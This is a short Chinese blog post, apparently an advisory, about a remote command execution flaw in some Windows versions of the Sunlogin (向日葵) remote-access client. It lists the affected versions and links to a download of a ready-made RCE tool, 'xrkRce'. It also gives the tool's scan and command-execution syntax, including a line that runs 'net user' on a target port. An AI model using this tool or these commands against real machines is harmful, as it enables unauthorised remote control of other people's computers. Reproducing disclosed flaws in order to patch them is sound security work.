向日葵个别版本存在REC远程命令执行漏洞

向日葵个别版本存在REC远程命令执行漏洞

漏洞版本：

上海贝锐信息科技股份有限公司 向日葵个人版for Windows 11.0.0.33 <= 
上海贝锐信息科技股份有限公司 向日葵简约版 V1.0.1.43315（2021.12）

漏洞RCE工具下载

https://wwa.lanzoul.com/iwvPH009iz6j

测试环境：

测试向日葵客户端漏洞版本：11.0.0.33162
漏洞客户端在RCE工具中提供。

操作命令：

-h 指定目标-t 选择扫描或者命令执行 默认scan-p 设置扫描端口范围 默认4w到65535-c 需要执行的命令
执行命令：  .\xrkRce -h 127.0.0.1 -t scan

漏洞复现成功：

执行命令：  .\xrkRce -h 127.0.0.1 -t  rce -p 58306 -c “net user” （冒号后面的是cmd命令）

漏洞修复

官方已发布了新版本修复，请受影响用户更新版本进行防护。

Contents

1. 向日葵个别版本存在REC远程命令执行漏洞

Original link: http://www.lovexue.cn/2022/02/18/向日葵个别版本存在REC远程命令执行漏洞/

Copyright Notice: 转载请注明出处.